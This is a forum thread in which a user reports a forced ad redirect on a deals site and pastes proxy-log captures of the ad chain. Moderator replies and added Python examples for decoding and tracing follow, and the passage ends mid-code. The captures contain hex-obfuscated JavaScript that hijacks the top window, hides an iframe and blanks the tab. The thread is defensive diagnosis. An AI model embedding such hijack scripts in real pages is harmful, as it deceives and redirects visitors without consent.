Forum Thread

Anyone been ad-jacked from slickdeals recently?

disk 1,750 626 December 9, 2015 at 09:57 PM
This evening I think I was ad-jacked, I didn't click an ad but as I was scrolling down a slickdeals page it redirected. I was not logged in. My mouse pointer may have gone over an ad as I was scrolling but I didn't click anything. I know this has happened before but it was a long time ago because I can't remember much about it. I am trying to trace it back (I have proxy logs this time) but I can't figure out where it started cause there's like a blizzard of 100 ad servers after the slickdeals connection, and I opened two tabs to slickdeals at once. And I can't post the logs here because they're mixed in with other traffic (though there might be some way to go through it one-by-one and pick out anything with an sd referrer).

Here's the link I clicked; it was from a slickdeals e-mail for a dell inspiron laptop:
Code:
http://slickdeals.net/da/mem-d/p80411667/k18/u87621/r6
Once the page loads it seems to go in this order:

ox-d.slickdeals.servedbyopenx.com
x.vindicosuite.com
go.goadvs.com

That last one is where things get wacky. See the attached screenshot. It directed me to a page saying "Site will resume in 10 secs..." then counts down and once it reached 0 it went to a blank tab (I happened to take the screenshot right before that happened).

Here's the handoff from vindico to goadvs

Code:
GET http://x.vindicosuite.com/serve/v=5;m=3;l=40295;c=874454;b=3764922;ts=1449723681;u=%3Cpage_url_escaped%3E;r=%3Creferrer_escaped%3E;ad=COe6AhDgehj4CyABKAQwjAs43YYBQIKiEUj5vA5Q1q81WLrl5QFgAGjSoB9wAHgBiAEA;z=CNavNRC65eUBGiQwNzc3MTkxMi0zOWY4LTQwYzgtODlkZS1kZjFmYTE2MjE3OWUqJDA3NzcxOTEyLTNhMDUtOTg5ZS04OWRlLWRmMWZhMTYyMTc5ZUCQ2y5NAAAAAFUAAAAAXQAAIEFlAAAgQW0AAAA%2FdVyPAj%2BSAQNVU0S9AVyPAj%2FQAQLYAQLgAQDoAQDwAQCQAgCYAgA%3D;xid=2901830426562714529;ep=1 HTTP/1.1
Host: x.vindicosuite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://slickdeals.net/f/8357843-dell-inspiron-15-i5558-5717slv-signature-edition-laptop-intel-core-i5-5250u-15-6-1080p-touchscreen-8gb-1tb-backlit-keyboard-win-10-449-free-shipping-microsoft-store?p=80411667&utm_source=dealalerts&utm_medium=em-d&utm_term=18&utm_content=u87621&utm_campaign=tu6
Cookie: ct=1449723681
Connection: keep-alive


HTTP/1.1 200 OK
Server: WebStar 1.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, HEAD, POST, TRACE, OPTIONS
Access-Control-Allow-Headers: Content-Type
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Thu, 10 Dec 2015 05:01:21 GMT

cd7
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="viewport" content="width=device-width, initial-scale=1"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><div id="SM__adt__40295376492214497236812011396893"><iframe src='http://go.goadvs.com/ad?id=20&p=55.00&w=300&h=250&ct=http://x.vindicosuite.com/click/v=5%3Bm=3%3Bl=40295%3Bc=874454%3Bb=3764922%3Bts=1449723681%3Bui=QylOXeNiXY0og1MFxsURBJvhQ8wCj6mmpXJxF17zugWFKkE6jY1_l3awSPnEwfivlpuN_qVj4ExxAjb-JRSR7g%3Bad=COe6AhDgehj4CyABKAQwjAs43YYBQIKiEUj5vA5Q1q81WLrl5QFgAGjSoB9wAHgBiAEA%3Bz=CNavNRC65eUBGiQwNzc3MTkxMi0zOWY4LTQwYzgtODlkZS1kZjFmYTE2MjE3OWUqJDA3NzcxOTEyLTNhMDUtOTg5ZS04OWRlLWRmMWZhMTYyMTc5ZUCQ2y5NAAAAAFUAAAAAXQAAIEFlAAAgQW0AAAA%2FdVyPAj%2BSAQNVU0S9AVyPAj%2FQAQLYAQLgAQDoAQDwAQCQAgCYAgA%3D%3Bxid=2901830426562714529%3Bep=1%3Bdct=' width=300 height=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'></iframe><script language="JavaScript" type="text/javascript" 
src="http://sdk.vindicosuite.com/verify_selector.js?event=1&iid=SM__adt__40295376492214497236812011396893&pid=0&lid=0&clid=3&aid=0&cid=0&crid=0&pt=3&ppid=1&pioid=&pbkid=282882&pcid=874454&plid=40295&dur=0&adw=300&adh=250&uebu=http%3A%2F%2Fx.vindicosuite.com%2Fevent%2Fe%3D%24SUGR_CUSTOM_EVENT_ID%24%3Bl%3D40295%3Bb%3D3764922%3Bc%3D874454%3Bsmuid%3D%3Bmsd%3D%3Bta%3D1449723681%3Btk%3D40668%3Bcr%3D2478432676%3Bad%3DCOe6AhDgehj4CyABKAQwjAs43YYBQIKiEUj5vA5Q1q81WLrl5QFgAGjSoB9wAHgBiAEA%3Bz%3DCNavNRC65eUBGiQwNzc3MTkxMi0zOWY4LTQwYzgtODlkZS1kZjFmYTE2MjE3OWUqJDA3NzcxOTEyLTNhMDUtOTg5ZS04OWRlLWRmMWZhMTYyMTc5ZUCQ2y5NAAAAAFUAAAAAXQAAIEFlAAAgQW0AAAA%252FdVyPAj%252BSAQNVU0S9AVyPAj%252FQAQLYAQLgAQDoAQDwAQCQAgCYAgA%253D%3Bxid%3D2901830426562714529%3Bdcr%3D1%3Beav%3D%24SUGR_EVENT_ARGUMENT%24%3B%24SUGR_EVENT_PARAM%24%3Beov%3D%24SUGR_EVENT_OBJ%24%3Bmpws%3D%24SUGR_AD_WIDTH%24%3Bmphs%3D%24SUGR_AD_HEIGHT%24%3Bdsd%3D%24SUGR_DETERMINED_DOMAIN%24%3Bsnvs%3D%24SNAP_IN_VIEW%24%3Bsls%3D%24APP_SUGR_LOCATION%24%3Bsvn%3D%24APP_SUGR_VERSION%24%3Bals%3D%24APP_ADT_LOCATION%24%3Bavn%3D%24APP_ADT_VERSION%24%3Bspr%3D%24SUGR_QUERY_PARAMETERS%24&rn=1449723681"></script></div><img src="http://cache.specificmedia.com/creative/blank.gif?ts=1449723681772&cmxid=2101.010087445403764922xmc" style="display: none" height="1" width="1" border="0" /><script>   var _comscore = _comscore || [];   _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891"});   (function() {     var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;     s.src = (document.location.protocol == "https:" ? 
"https://sb" : "http://b") + ".scorecardresearch.com/beacon.js"; el.parentNode.insertBefore(s, el);   })(); </script> <noscript>   <img src="http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1" /> </noscript><script language="JavaScript" type="text/javascript" src="http://x.vindicosuite.com/event/e=52;l=40295;b=3764922;c=874454;smuid=;ts=1449723681"></script><iframe style="position: absolute;" src="https://b12.myspace.com/b12/0" width="1" height="0" marginwidth="0" marginheight="0" topmargin="0" leftmargin="0" frameborder="0" scrolling="no" bordercolor="#000000"></iframe></body></html>
0
So in there you can see an iframe, here's part of it:
Code:
<iframe src='http://go.goadvs.com/ad?id=20&p=55.00&w=300&h=250&ct=http://x.vindicosuite.com/click.....
Here's goadvs:
Code:
GET http://go.goadvs.com/ad?id=20&p=55.00&w=300&h=250&ct=http://x.vindicosuite.com/click/v=5%3Bm=3%3Bl=40295%3Bc=874454%3Bb=3764922%3Bts=1449723681%3Bui=QylOXeNiXY0og1MFxsURBJvhQ8wCj6mmpXJxF17zugWFKkE6jY1_l3awSPnEwfivlpuN_qVj4ExxAjb-JRSR7g%3Bad=COe6AhDgehj4CyABKAQwjAs43YYBQIKiEUj5vA5Q1q81WLrl5QFgAGjSoB9wAHgBiAEA%3Bz=CNavNRC65eUBGiQwNzc3MTkxMi0zOWY4LTQwYzgtODlkZS1kZjFmYTE2MjE3OWUqJDA3NzcxOTEyLTNhMDUtOTg5ZS04OWRlLWRmMWZhMTYyMTc5ZUCQ2y5NAAAAAFUAAAAAXQAAIEFlAAAgQW0AAAA%2FdVyPAj%2BSAQNVU0S9AVyPAj%2FQAQLYAQLgAQDoAQDwAQCQAgCYAgA%3D%3Bxid=2901830426562714529%3Bep=1%3Bdct= HTTP/1.1
Host: go.goadvs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://x.vindicosuite.com/serve/v=5;m=3;l=40295;c=874454;b=3764922;ts=1449723681;u=%3Cpage_url_escaped%3E;r=%3Creferrer_escaped%3E;ad=COe6AhDgehj4CyABKAQwjAs43YYBQIKiEUj5vA5Q1q81WLrl5QFgAGjSoB9wAHgBiAEA;z=CNavNRC65eUBGiQwNzc3MTkxMi0zOWY4LTQwYzgtODlkZS1kZjFmYTE2MjE3OWUqJDA3NzcxOTEyLTNhMDUtOTg5ZS04OWRlLWRmMWZhMTYyMTc5ZUCQ2y5NAAAAAFUAAAAAXQAAIEFlAAAgQW0AAAA%2FdVyPAj%2BSAQNVU0S9AVyPAj%2FQAQLYAQLgAQDoAQDwAQCQAgCYAgA%3D;xid=2901830426562714529;ep=1
Connection: keep-alive


HTTP/1.1 200 OK
Date: Thu, 10 Dec 2015 05:01:21 GMT
Content-Length: 984
Content-Type: text/html; charset=utf-8
Via: 1.1 google
Server: GFE/2.0

<!DOCTYPE html>
<html>
<head>
</head>
<body>
<script>
try {
window.top.location.href="http://go.goadvs.com/intrsl?id=20&uuid=eafcdb7e-73e7-449c-92ea-d99f5bf8ada8&ts=1449723681935167695&w=300&h=250&ct=Alw345BiZ1B2wPB2wDqfskaf0TamxC9WASwagk9Ox1B2wk9NA-9UYeYTsPBiwLBap3YGYe9Ep2BiZkrap3Z3pLXI91BiZkpap3ZM9iZ39eZap3YPYe9Epi4o9LJ2pPBiZDwiYe9EpeZ3je42piQMp1BiZDtdYe9EBSaNeWVaekaQ-e~O0ib9wDVittY51D0vBeVCZovox-Wr-EdMwmEC.DtDt30gA3BoAaJFSoriQSseBTIbso0dskFrsBI84t0y9EtM.EbyQPW_Ba919o4ap3YV05BiwE960e0~AEwD0-Vy9E9IZBYgZtbCAJbi9L90-BYw1BGdwtty9S0~9tEF4eqFt3F2xLtwwks~wodex3XIs3bX03YdZBt~Ye95.PBiwE9jQS0jBJpo9-ttZJsdBSsj.kpietwU.EWdpld6tWJ3ebwwsWaz0Cw6wTFU-apFAWdywkW0tEB2e-dbp3uStSb_wEEieDdm.EuBwSaptEIveBwtsEuB0itABin3eWs1xEFSBkW9tWdvetw0.BWBQitAtB9wpDJWeJb~ZBb~wat~ZBb~ZtVwZBbYwB0NZBb~0WbSpEb~ZBEapJ0JtDaZZ-vapJYeZtbjtaBrBia~tDaZZ-vapJ0wZtbp-BbweTs~BBwOZtbEs3bwZWb~0390Z-s~Ye9EYe95.TaJYe9EpmJrpeqipLZ29mBopm4F9LB2j1BiZktrYe9Ep1BiZkwms5Biwn=="
} catch(e) {}
</script>
</body>
</html>
So in there you can see window location changed, here's part of it:
Code:
window.top.location.href="http://go.goadvs.com/intrsl?id=20&uuid=eafcdb7e-73e7-449c-92ea-d99f5bf8ada8&ts=1449723681935167695&w=300&h=250
Here's that destination at goadvs:
Code:
GET http://go.goadvs.com/intrsl?id=20&uuid=eafcdb7e-73e7-449c-92ea-d99f5bf8ada8&ts=1449723681935167695&w=300&h=250&ct=Alw345BiZ1B2wPB2wDqfskaf0TamxC9WASwagk9Ox1B2wk9NA-9UYeYTsPBiwLBap3YGYe9Ep2BiZkrap3Z3pLXI91BiZkpap3ZM9iZ39eZap3YPYe9Epi4o9LJ2pPBiZDwiYe9EpeZ3je42piQMp1BiZDtdYe9EBSaNeWVaekaQ-e~O0ib9wDVittY51D0vBeVCZovox-Wr-EdMwmEC.DtDt30gA3BoAaJFSoriQSseBTIbso0dskFrsBI84t0y9EtM.EbyQPW_Ba919o4ap3YV05BiwE960e0~AEwD0-Vy9E9IZBYgZtbCAJbi9L90-BYw1BGdwtty9S0~9tEF4eqFt3F2xLtwwks~wodex3XIs3bX03YdZBt~Ye95.PBiwE9jQS0jBJpo9-ttZJsdBSsj.kpietwU.EWdpld6tWJ3ebwwsWaz0Cw6wTFU-apFAWdywkW0tEB2e-dbp3uStSb_wEEieDdm.EuBwSaptEIveBwtsEuB0itABin3eWs1xEFSBkW9tWdvetw0.BWBQitAtB9wpDJWeJb~ZBb~wat~ZBb~ZtVwZBbYwB0NZBb~0WbSpEb~ZBEapJ0JtDaZZ-vapJYeZtbjtaBrBia~tDaZZ-vapJ0wZtbp-BbweTs~BBwOZtbEs3bwZWb~0390Z-s~Ye9EYe95.TaJYe9EpmJrpeqipLZ29mBopm4F9LB2j1BiZktrYe9Ep1BiZkwms5Biwn== HTTP/1.1
Host: go.goadvs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://go.goadvs.com/ad?id=20&p=55.00&w=300&h=250&ct=http://x.vindicosuite.com/click/v=5%3Bm=3%3Bl=40295%3Bc=874454%3Bb=3764922%3Bts=1449723681%3Bui=QylOXeNiXY0og1MFxsURBJvhQ8wCj6mmpXJxF17zugWFKkE6jY1_l3awSPnEwfivlpuN_qVj4ExxAjb-JRSR7g%3Bad=COe6AhDgehj4CyABKAQwjAs43YYBQIKiEUj5vA5Q1q81WLrl5QFgAGjSoB9wAHgBiAEA%3Bz=CNavNRC65eUBGiQwNzc3MTkxMi0zOWY4LTQwYzgtODlkZS1kZjFmYTE2MjE3OWUqJDA3NzcxOTEyLTNhMDUtOTg5ZS04OWRlLWRmMWZhMTYyMTc5ZUCQ2y5NAAAAAFUAAAAAXQAAIEFlAAAgQW0AAAA%2FdVyPAj%2BSAQNVU0S9AVyPAj%2FQAQLYAQLgAQDoAQDwAQCQAgCYAgA%3D%3Bxid=2901830426562714529%3Bep=1%3Bdct=
Connection: keep-alive


HTTP/1.1 200 OK
Date: Thu, 10 Dec 2015 05:01:22 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Via: 1.1 google
Server: GFE/2.0

800
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<script>
var e= document.createElement("div")
e.setAttribute("style","\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x74\x6F\x70\x3A\x30\x3B\x6D\x61\x72\x67\x69\x6E\x3A\x30\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x31\x30\x30\x25\x3B\x6C\x65\x66\x74\x3A\x30\x3B\x72\x69\x67\x68\x74\x3A\x30\x3B\x6F\x76\x65\x72\x66\x6C\x6F\x77\x3A\x68\x69\x64\x64\x65\x6E\x3B\x63\x6F\x6C\x6F\x72\x3A\x23\x46\x46\x30\x30\x30\x30\x3B\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x3A\x23\x46\x46\x46\x46\x46\x46\x3B");
e.id="go"
e.innerHTML="<br>Site will resume in 10 secs...<hr color='#A8A8A'>"
try{document.body.appendChild(e)}catch(h){}
var b= document.createElement("div");
b.id="ok";
b.setAttribute("style","\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x74\x6F\x70\x3A\x35\x70\x78\x3B\x20\x72\x69\x67\x68\x74\x3A\x35\x70\x78\x3B\x20\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x3B\x20\x6D\x61\x72\x67\x69\x6E\x3A\x30\x3B\x6F\x76\x65\x72\x66\x6C\x6F\x77\x3A\x68\x69\x64\x64\x65\x6E\x3B\x20\x6F\x70\x61\x63\x69\x74\x79\x3A\x30\x3B");
b.innerHTML="<iframe src='http://go.goadvs.com/get?id=20&uuid=eafcdb7e-73e7-449c-92ea-d99f5bf8ada8&ts=1449723681935167695&ct=http%3A%2F%2Fx.vindicosuite.com%2Fclick%2Fv%3D5%3Bm%3D3%3Bl%3D40295%3Bc%3D874454%3Bb%3D3764922%3Bts%3D1449723681%3Bui%3DQylOXeNiXY0og1MFxsURBJvhQ8wCj6mmpXJxF17zugWFKkE6jY1_l3awSPnEwfivlpuN_qVj4ExxAjb-JRSR7g%3Bad%3DCOe6AhDgehj4CyABKAQwjAs43YYBQIKiEUj5vA5Q1q81WLrl5QFgAGjSoB9wAHgBiAEA%3Bz%3DCNavNRC65eUBGiQwNzc3MTkxMi0zOWY4LTQwYzgtODlkZS1kZjFmYTE2MjE3OWUqJDA3NzcxOTEyLTNhMDUtOTg5ZS04OWRlLWRmMWZhMTYyMTc5ZUCQ2y5NAAAAAFUAAAAAXQAAIEFlAAAgQW0AAAA%2FdVyPAj%2BSAQNVU0S9AVyPAj%2FQAQLYAQLgAQDoAQDwAQCQAgCYAgA%3D%3Bxid%3D2901830426562714529%3Bep%3D1%3Bdct%3D' WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'></iframe>"
try{document.body.appendChild(b)}catch(h){}
var a=document.createElement("a")
a.setAttribute("style","\x76\x69\x73\x69\x62\
800
x69\x6C\x69\x74\x79\x3A\x68\x69\x64\x64\x65\x6E\x3B\x63\x6F\x6C\x6F\x72\x3A\x20\x23\x30\x30\x30\x30\x45\x45\x3B\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x66\x6F\x6E\x74\x2D\x73\x69\x7A\x65\x3A\x20\x31\x2E\x34\x65\x6D\x3B\x20\x74\x6F\x70\x3A\x35\x70\x78\x3B\x20\x72\x69\x67\x68\x74\x3A\x35\x70\x78\x3B\x20\x6D\x61\x72\x67\x69\x6E\x3A\x30\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3D\x2D\x31");
a.text = "Go to Site >";
a.href="#"
a.id="yo"
try{document.body.appendChild(a)}catch(h){}
e= document.createElement("div")
e.id="error"
e.setAttribute("style","\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x66\x6F\x6E\x74\x2D\x73\x69\x7A\x65\x3A\x32\x65\x6D\x3B\x77\x69\x64\x74\x68\x3A\x33\x30\x30\x70\x78\x3B\x68\x65\x69\x67\x68\x74\x3A\x32\x35\x30\x70\x78\x3B\x70\x61\x64\x64\x69\x6E\x67\x3A\x32\x30\x70\x78\x3B\x74\x65\x78\x74\x2D\x61\x6C\x69\x67\x6E\x3A\x63\x65\x6E\x74\x65\x72\x3B\x6C\x65\x66\x74\x3A\x33\x38\x25\x3B\x6D\x61\x72\x67\x69\x6E\x3A\x61\x75\x74\x6F\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3D\x32\x3B\x62\x6F\x74\x74\x6F\x6D\x3A\x35\x30\x25\x3B\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x3A\x23\x46\x30\x46\x30\x46\x30\x3B\x62\x6F\x72\x64\x65\x72\x2D\x63\x6F\x6C\x6F\x72\x3A\x23\x41\x38\x41\x38\x41\x38\x3B\x62\x6F\x72\x64\x65\x72\x2D\x73\x74\x79\x6C\x65\x3A\x73\x6F\x6C\x69\x64\x3B\x62\x6F\x72\x64\x65\x72\x2D\x77\x69\x64\x74\x68\x3A\x32\x70\x78\x3B");
e.innerHTML="<img src='http://storage.googleapis.com/psas/adc_fma_call_ny_300x250.jpg'>"
try{document.body.appendChild(e)}catch(h){}
e=document.createElement("div")
e.setAttribute("style","\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x72\x69\x67\x68\x74\x3A\x32\x30\x70\x78\x3B\x74\x6F\x70\x3A\x31\x70\x78\x3B\x66\x6F\x6E\x74\x2D\x73\x69\x7A\x65\x3A\x30\x2E\x34\x65\x6D\x3B\x74\x65\x78\x74\x2D\x61\x6C\x69\x67\x6E\x3A\x72\x69\x67\x68\x74");
e.innerHTML="Advertisment"
try {document.getElementById("error").appendChild(e);} catch(h){}
var _0xed74=["\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74","\x76\x69\x73
4c3
\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x79\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x76\x69\x73\x69\x62\x6C\x65","\x67\x6F","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x62\x72\x3E\x53\x69\x74\x65\x20\x77\x69\x6C\x6C\x20\x72\x65\x73\x75\x6D\x65\x20\x69\x6E\x20","\x20\x73\x65\x63\x73\x2E\x2E\x2E\x3C\x68\x72\x20\x63\x6F\x6C\x6F\x72\x3D\x27\x23\x41\x38\x41\x38\x41\x38\x27\x3E","","\x72\x65\x6D\x6F\x76\x65\x43\x68\x69\x6C\x64","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x6F\x6B","\x61\x62\x6F\x75\x74\x3A\x62\x6C\x61\x6E\x6B","\x72\x65\x70\x6C\x61\x63\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];var secs=10;window[_0xed74[0]](cd,1000,secs);function cd(_0x21dcx3){try{if(_0x21dcx3>0){_0x21dcx3--;if(secs-_0x21dcx3==1){document[_0xed74[4]](_0xed74[3])[_0xed74[2]][_0xed74[1]]=_0xed74[5]};x=document[_0xed74[4]](_0xed74[6]);x[_0xed74[7]]=_0xed74[8]+_0x21dcx3+_0xed74[9];window[_0xed74[0]](cd,1000,_0x21dcx3);}else {x=document[_0xed74[4]](_0xed74[6]);x[_0xed74[7]]=_0xed74[10];}}catch(e){}}window[_0xed74[0]](function(){try{document[_0xed74[4]](_0xed74[13])[_0xed74[12]][_0xed74[11]](b)}catch(e){};window[_0xed74[16]][_0xed74[15]](_0xed74[14]);},15000);
</script>
</body>
</html>
0
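An added example (not part of the original post, and not code from any of the sites involved): a static decoder for the `\xNN`-escaped strings in the `intrsl` response above, which resolves the `_0xed74[n]` lookups without running the script. The regular expressions and the chunk-size heuristic are assumptions that fit this capture.

```python
import json
import re

# Excerpt copied from the go.goadvs.com/intrsl response in the post, with the
# chunk-size line ("4c3") still inside the array; the cd() countdown is omitted.
CAPTURED = r'''b.setAttribute("style","\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x74\x6F\x70\x3A\x35\x70\x78\x3B\x20\x72\x69\x67\x68\x74\x3A\x35\x70\x78\x3B\x20\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x3B\x20\x6D\x61\x72\x67\x69\x6E\x3A\x30\x3B\x6F\x76\x65\x72\x66\x6C\x6F\x77\x3A\x68\x69\x64\x64\x65\x6E\x3B\x20\x6F\x70\x61\x63\x69\x74\x79\x3A\x30\x3B");
var _0xed74=["\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74","\x76\x69\x73
4c3
\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x79\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x76\x69\x73\x69\x62\x6C\x65","\x67\x6F","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x62\x72\x3E\x53\x69\x74\x65\x20\x77\x69\x6C\x6C\x20\x72\x65\x73\x75\x6D\x65\x20\x69\x6E\x20","\x20\x73\x65\x63\x73\x2E\x2E\x2E\x3C\x68\x72\x20\x63\x6F\x6C\x6F\x72\x3D\x27\x23\x41\x38\x41\x38\x41\x38\x27\x3E","","\x72\x65\x6D\x6F\x76\x65\x43\x68\x69\x6C\x64","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x6F\x6B","\x61\x62\x6F\x75\x74\x3A\x62\x6C\x61\x6E\x6B","\x72\x65\x70\x6C\x61\x63\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];var secs=10;window[_0xed74[0]](cd,1000,secs);
window[_0xed74[0]](function(){try{document[_0xed74[4]](_0xed74[13])[_0xed74[12]][_0xed74[11]](b)}catch(e){};window[_0xed74[16]][_0xed74[15]](_0xed74[14]);},15000);
'''

CHUNK_LINE = re.compile(r"\r?\n[0-9A-Fa-f]{1,8}\r?\n")
HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")
ARRAY_DECL = re.compile(r"var\s+(_0x[0-9A-Fa-f]+)\s*=\s*\[(.*?)\];", re.S)
STRING_LIT = re.compile(r'"((?:[^"\\]|\\.)*)"')

def decode_hex(text):
    """Turn \\xNN escapes into characters without evaluating any script."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)

def deobfuscate(captured):
    """Return (string table, readable script) for a pasted response body."""
    # Heuristic: a line holding only hex digits is a chunk size, so drop it
    # and rejoin the halves of any escape sequence it split.
    text = CHUNK_LINE.sub("", captured)
    table = []
    decl = ARRAY_DECL.search(text)
    if decl:
        # Parse the table while it is still escaped, then decode each entry.
        table = [decode_hex(s) for s in STRING_LIT.findall(decl.group(2))]
        lookup = re.compile(re.escape(decl.group(1)) + r"\[(\d+)\]")

        def resolve(m):
            i = int(m.group(1))
            return json.dumps(table[i]) if i < len(table) else m.group(0)

        text = lookup.sub(resolve, text)
    return table, decode_hex(text)

if __name__ == "__main__":
    print(deobfuscate(CAPTURED)[1])
```

On this capture the last statement resolves to `window["location"]["replace"]("about:blank")` on a 15000 ms timer, which matches the blank tab described in the post, and the `ok` div that holds the `go.goadvs.com/get` iframe is styled `opacity:0`.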


#2
Quote from disk:
This evening I think I was ad-jacked, I didn't click an ad but as I was scrolling down a slickdeals page it redirected. I was not logged in. My mouse pointer may have gone over an ad as I was scrolling but I didn't click anything. I know this has happened before but it was a long time ago because I can't remember much about it. I am trying to trace it back (I have proxy logs this time) but I can't figure out where it started cause there's like a blizzard of 100 ad servers after the slickdeals connection, and I opened two tabs to slickdeals at once. And I can't post the logs here because they're mixed in with other traffic (though there might be some way to go through it one-by-one and pick out anything with an sd referrer).

Here's the link I clicked; it was from a slickdeals e-mail for a dell inspiron laptop:
Code:
http://slickdeals.net/da/mem-d/p80411667/k18/u87621/r6
Once the page loads it seems to go in this order:

ox-d.slickdeals.servedbyopenx.com
x.vindicosuite.com
go.goadvs.com

That last one is where things get wacky. See the attached screenshot. It directed me to a page saying "Site will resume in 10 secs..." then counts down and once it reached 0 it went to a blank tab (I happened to take the screenshot right before that happened).
Hey disk,

This is a huge help. Thanks so much for including this info. I'm working on finding the source of this right now. By end of day, I should get confirmation that it's been blocked.
Last edited by cgrady December 10, 2015 at 11:50 AM
Original Poster
#3
Quote from doublewood:
Hey disk,

This is a huge help. Thanks so much for including this info. I'm working on finding the source of this right now. By end of day, I should get confirmation that it's been blocked.
Great, cause I just got ad-jacked again as I opened this page to check replies. Same goadvs outcome. If you need anything else let me know.

Edit: Also note the ad-jack is aggressive, if I click the back button it just brings me forward to the goadvs thing again with a different ad. To work around this I opened a second tab to this same thread which is how I'm posting this.
Edit2: The ad-jacking on this page may have something to do with the way you quoted your reply which originally included the ad html code I posted, therefore that code may have caused the ad-jacking as it was quoted so I can't say for certain I was ad-jacked this time, the html in the quoted reply may have done it.
Last edited by disk December 10, 2015 at 11:53 AM
#4
Quote from disk:
Great, cause I just got ad-jacked again as I opened this page to check replies. Same goadvs outcome. If you need anything else let me know.

Edit: Also note the ad-jack is aggressive, if I click the back button it just brings me forward to the goadvs thing again with a different ad. To work around this I opened a second tab to this same thread which is how I'm posting this.
Edit2: The ad-jacking on this page may have something to do with the way you quoted your reply which originally included the ad html code I posted, therefore that code may have caused the ad-jacking as it was quoted so I can't say for certain I was ad-jacked this time, the html in the quoted reply may have done it.
Exactly right. The reason we were seeing it on this thread is because of the way I quoted the code. My post is now edited and I'm not seeing the ad anymore. I haven't been able to replicate, which is good because it means it's rare, but I do want to catch it to get more info on where it's coming from. The code you provided is very helpful and I still think we'll be able to get to the bottom of it. We have pretty basic ads on the site through the largest, most credible, and established platforms. We have a zero tolerance policy on any kind of intrusive ads like these interstitials.
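An added example, not code from the thread or from Slickdeals: one way to do what the first post describes (pick out only the traffic with an SD referrer) and what this reply asks for (where the redirect came from), by following Referer headers through a proxy log in the request format shown in the first post. The sample log is constructed with shortened placeholder URLs, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit

# Constructed sample in the request format shown in the first post; URLs are
# shortened placeholders and unrelated.example stands in for other traffic.
SAMPLE_LOG = """\
GET http://slickdeals.net/f/placeholder-deal-page HTTP/1.1

GET http://unrelated.example/style.css HTTP/1.1
Referer: http://unrelated.example/news

GET http://ox-d.slickdeals.servedbyopenx.com/placeholder HTTP/1.1
Referer: http://slickdeals.net/f/placeholder-deal-page

GET http://x.vindicosuite.com/serve/placeholder HTTP/1.1
Referer: http://slickdeals.net/f/placeholder-deal-page

GET http://go.goadvs.com/ad?id=20 HTTP/1.1
Referer: http://x.vindicosuite.com/serve/placeholder

GET http://go.goadvs.com/intrsl?id=20 HTTP/1.1
Referer: http://go.goadvs.com/ad?id=20
"""

REQUEST = re.compile(r"^(?:GET|POST|HEAD) (\S+) HTTP/1\.[01]$")
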